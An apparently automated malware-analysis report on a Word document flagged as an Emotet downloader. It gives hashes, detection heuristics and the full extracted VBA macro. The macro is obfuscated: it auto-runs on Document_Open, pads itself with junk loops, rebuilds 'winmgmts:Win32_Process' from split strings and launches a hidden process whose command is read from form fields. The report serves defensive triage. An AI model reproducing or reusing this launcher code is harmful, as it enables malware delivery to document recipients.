Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4596778d372f74ec…

MALICIOUS

Office (OLE)

165.6 KB Created: 2019-12-11 13:09:00 Authoring application: Microsoft Office Word First seen: 2021-02-18
MD5: 2f5288c981be4fc8d7a8bfc6dd4f17ff SHA-1: 0d2a971e4881bc6d04cc40882cd24a153b779caa SHA-256: 4596778d372f74ec3886ee01245edde90f3d44e74342daf19074b4b8ceb56848
292 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-7445950-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7445950-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7753 bytes
SHA-256: 8beca7cafa87211b5c5bc173f3309c952810099a32b155a0aa6085e417631f5a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
190 of 281 identifiers look randomly generated (e.g. 'Bwkhgfbhpexid') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Tnfihhkold"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Nxzzxecraqe, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Lonlcahnwu = Efabmbhyrqa To 0
         Olkrqtnlucwt = (13 - Atn(51) - (44 + Round(41) * Pvopmsbezldo / CInt(1)))
    Select Case Etvorrnow
      Case Bzejddigj
         Dbndsklz = CLng(Gigbhibo)
         Yrjltxvw = Oct(Hdmaqtaozddx)
      Case Uqxivvgr
         Fmscjvoorsud = Kohnpaxaj
         Cznbmopyvvd = Int(29)
   End Select
Next
   For Irlztgxwl = Hshuombaatkvb To 0
         Rbbyudhvd = (13 - Atn(51) - (44 + Round(41) * Vmjwhzpv / CInt(1)))
    Select Case Btwmmksmyvkk
      Case Wvnhuzwejnr
         Emkgfkmpiel = CLng(Pifppkyvzmmh)
         Vxjjvyuo = Oct(Pezbyoqbzck)
      Case Txgpuezyzfgqs
         Pjxahralkxwl = Iythyqlpjz
         Pqztkgqv = Int(29)
   End Select
Next
   For Xajblukldn = Enqalmyplts To 0
         Bedsjwydei = (13 - Atn(51) - (44 + Round(41) * Dyftuflmcsz / CInt(1)))
    Select Case Rynryehpp
      Case Gstqrjafxkh
         Wrnhhjifrksx = CLng(Felbooqmbl)
         Ssuoxjkuvhqzh = Oct(Jphbtfxv)
      Case Jtzcjpcnlq
         Dninrqxomt = Gxukbqvwubo
         Smsnmwpkxl = Int(29)
   End Select
Next
Gcmadomyup
End Sub

Attribute VB_Name = "Bmbppnxuf"
Attribute VB_Base = "0{7A11953C-AA0C-4E87-9177-77DE18B9B140}{C9A7DE2F-4655-41D6-8EAE-1D5AD8262154}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tdyszmnvdid"
Function Gmgupsfx()
   For Eifzwznd = Rsnniyag To 0
         Kabvjiowxiw = (13 - Atn(51) - (44 + Round(41) * Mxjeavsujwsiy / CInt(1)))
    Select Case Mjztznsegjqo
      Case Fuheuapyual
         Adjnlcvknidnk = CLng(Cujhhddcldde)
         Pzierrbxwfl = Oct(Sldrjgwvz)
      Case Nsxbxjhy
         Xjvjscseyewrw = Hmuxgrpieqz
         Amxmwjuciiqed = Int(29)
   End Select
Next
Eqsgrburihqb = Tnfihhkold.Nxzzxecraqe
   For Vxkidmgpgwroy = Tvlrsvaecysxz To 0
         Wirsjaqzs = (13 - Atn(51) - (44 + Round(41) * Edlrrvntet / CInt(1)))
    Select Case Cbvthjkohy
      Case Jwggydvs
         Rxtlhxjfm = CLng(Woqohipiw)
         Ekiuoguby = Oct(Vjxawbnfb)
      Case Tmhpsrugkk
         Sidnickkpk = Grgmnuqcturv
         Odhsmurxfrtoe = Int(29)
   End Select
Next
Kmmppwlxukiud = Eqsgrburihqb + Bmbppnxuf.Desznstht + Bmbppnxuf.Lmdujlerr + Bmbppnxuf.Vuepnmxui
   For Cxkdeohnwzavb = Lqyvkhyt To 0
         Hseizovtz = (13 - Atn(51) - (44 + Round(41) * Bwkhgfbhpexid / CInt(1)))
    Select Case Bttqddjx
      Case Dexkfbbsekuoo
         Wmlbkkbr = CLng(Bajdvrynld)
         Wkdvpzhk = Oct(Ppgrywmlc)
      Case Ydbsoisv
         Aasqayou = Kywktwetba
         Ocyhbdbq = Int(29)
   End Select
Next
Unfitkxdgdkb = Kmmppwlxukiud + Bmbppnxuf.Atxilvqeasjdz + Bmbppnxuf.Mpwefpspspmiy.ControlTipText
   For Slgjxfcxtecj = Bpklcqlnpkzl To 0
         Qgubsqlp = (13 - Atn(51) - (44 + Round(41) * Sdspsqrahlo / CInt(1)))
    Select Case Lypgewvjm
      Case Gnkaqcfmiwtzx
         Ztzdbpjyiddk = CLng(Kefluifgqjfg)
         Msyrkjwckjqix = Oct(Wnsysyrn)
      Case Npscqyvm
         Qelzxwiuwu = Qetvnhkaue
         Xueztlvvndl = Int(29)
   End Select
Next
Gmgupsfx = Psirofzor + Unfitkxdgdkb + Psirofzor
   For Eofgldaguurl = Xkaffsctfh To 0
         Pvvfgjjecnkab = (13 - Atn(51) - (44 + Round(41) * Rkfqukheapqo / CInt(1)))
    Select Case Liynmnelooh
      Case Hjzadlzkizq
         Iruqpvaoqem = CLng(Gofvrjsvzub)
         Djfcjhpxfnr = Oct(Lbaqennneleni)
      Case Uixtacsri
         Exsbboxsxrui = Czyyapbzidw
         Xwtjscjjpvcjq = Int(29)
   End Select
Next
End Function
Function Gcmadomyup()
   For Drzmxzpijtkl = Hpmubkld To 0
         Funwdnqaqfq = (13 - Atn(51) - (44 + Round(41) * Abyqqqpe / CInt(1)))
    Select Case Guhphcghz
      Case Hcltfvcjva
         Mmtduvmrlvohb = CLng(Ixjyqyusynwkv)
         Oftxvdozmmnt = Oct(Odrjxullcv)
      Case Tvqxkrergjne
         Uyxldfxhkjfa = Jdcyycksjobv
         Eeqnjcamo = Int(29)
   End Select
Next
Jzkbsnjupxfbo = QWE + "w" + "i" + "nmg" + "mts:Wi" + "n32" + "_P" + "roc" + "ess"
   For Jfdtyjfvaeoc = Zdgnmcqgwffk To 0
         Dpkixvrnucm = (13 - Atn(51) - (44 + Round(41) * Oalyqzrtchf / CInt(1)))
    Select Case Bdjynorsr
      Case Ffseljeaincg
         Plbtahfvr = CLng(Evoynxwpssk)
         Itdefszwyry = Oct(Yqdoknyqhnp)
      Case Qfrroeenlhea
         Trfeqvwygleiw = Afnckbufhcuyc
         Znuofycjzh = Int(29)
   End Select
Next
Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
   For Pebysvkuo = Icugxemgsq To 0
         Mvbebzdtn = (13 - Atn(51) - (44 + Round(41) * Mputgyhsqrrlm / CInt(1)))
    Select Case Gaxpqrmxo
      Case Rjukrxncirc
         Hlxmovjpx = CLng(Cwyehzrgqqhy)
         Atxjyneqr = Oct(Uzjttbumc)
      Case Zjvjawtpamag
         Mgyjomfq = Ahmxpnmvxgt
         Pnhwbhstswr = Int(29)
   End Select
Next
Rkkopnwmumv = Jzkbsnjupxfbo + "ST" + WE + "ART" + "U"
   For Caiqdnnfxw = Sfaavgkas To 0
         Isuabrbymqp = (13 - Atn(51) - (44 + Round(41) * Zpgmqiekf / CInt(1)))
    Select Case Pqxljnttxma
      Case Nmnwyxqcut
         Zxkjadcsg = CLng(Uppzwwmuyr)
         Dvimhklvwwfjp = Oct(Wixfdcbtgi)
      Case Ghycocygosrv
         Poykfkompmbm = Ccbdjrfnytrhr
         Ercximnuwdnf = Int(29)
   End Select
Next
Aepkxfotdf = Rkkopnwmumv + Tnfihhkold.Nxzzxecraqe
   For Rbubsipuqbaz = Coadndte To 0
         Qguiyugfp = (13 - Atn(51) - (44 + Round(41) * Junlwrjwcyd / CInt(1)))
    Select Case Vehdeyxn
      Case Lmohvvuvklq
         Nrrlkixhncqm = CLng(Dbrzahgczi)
         Ahdsrnckulm = Oct(Fdfxjxuajqu)
      Case Qlmkrjbwhq
         Ldkjsroemvdb = Kpmqqiyfxqy
         Dkqxnadyukrq = Int(29)
   End Select
Next
Set Gcmadomyup = CreateObject((Aepkxfotdf))
   For Dggworcvuzbnq = Ioceoabivpt To 0
         Lvukfffun = (13 - Atn(51) - (44 + Round(41) * Gqpijhuxzqk / CInt(1)))
    Select Case Zwybxlhubwjzf
      Case Klwuqnyyks
         Uwqpaxxlihd = CLng(Qveufjeq)
         Ntqgiaynjy = Oct(Xlhjbheach)
      Case Zstdfjuxjkcv
         Pljuuyeextn = Xmljguyhq
         Iadadnimzlst = Int(29)
   End Select
Next
Gcmadomyup.XSize = Empty * Empty
   For Juleqdzobsl = Otoybmifmdp To 0
         Lxqtwmqzbkgm = (13 - Atn(51) - (44 + Round(41) * Erzeresxbaqul / CInt(1)))
    Select Case Xrvmwrbyhw
      Case Rmjhlope
         Zxmcovpdbb = CLng(Dtkzqectsit)
         Kstfgvlx = Oct(Yaudfieuxccj)
      Case Lykcturejbedw
         Forsbmzwbwlno = Ybbwuhki
         Atqsycmhyrnl = Int(29)
   End Select
Next
Gcmadomyup.YSize = Empty * Empty
   For Mbfheouzvfgv = Kjfkycmzkb To 0
         Gzjiblzsx = (13 - Atn(51) - (44 + Round(41) * Xscyosodx / CInt(1)))
    Select Case Fucrpehnr
      Case Zhvqmeuw
         Mbhswexgvxg = CLng(Uofjvulk)
         Usucxfji = Oct(Ptsvztzjgvg)
      Case Fbbhuzblf
         Nzcbaalpfdmbw = Cucdlwxmob
         Pizdkntharyjf = Int(29)
   End Select
Next
Do While Toneavbh.Create(Null & Gmgupsfx, Racxlvln, Gcmadomyup)
Loop
   For Fttklwhyoto = Geoohdzhedbw To 0
         Mardunxwxt = (13 - Atn(51) - (44 + Round(41) * Eelbkdypxn / CInt(1)))
    Select Case Spwgaprodmvyw
      Case Jxjhvwzzvvdt
         Rmyrskfrqvhcd = CLng(Ineujpsnfnc)
         Akxwsqlawhd = Oct(Rgnzstthmiy)
      Case Izzsdqqprgy
         Ntqmfbntxm = Vizhncyxd
         Bdempzaapp = Int(29)
   End Select
Next
End Function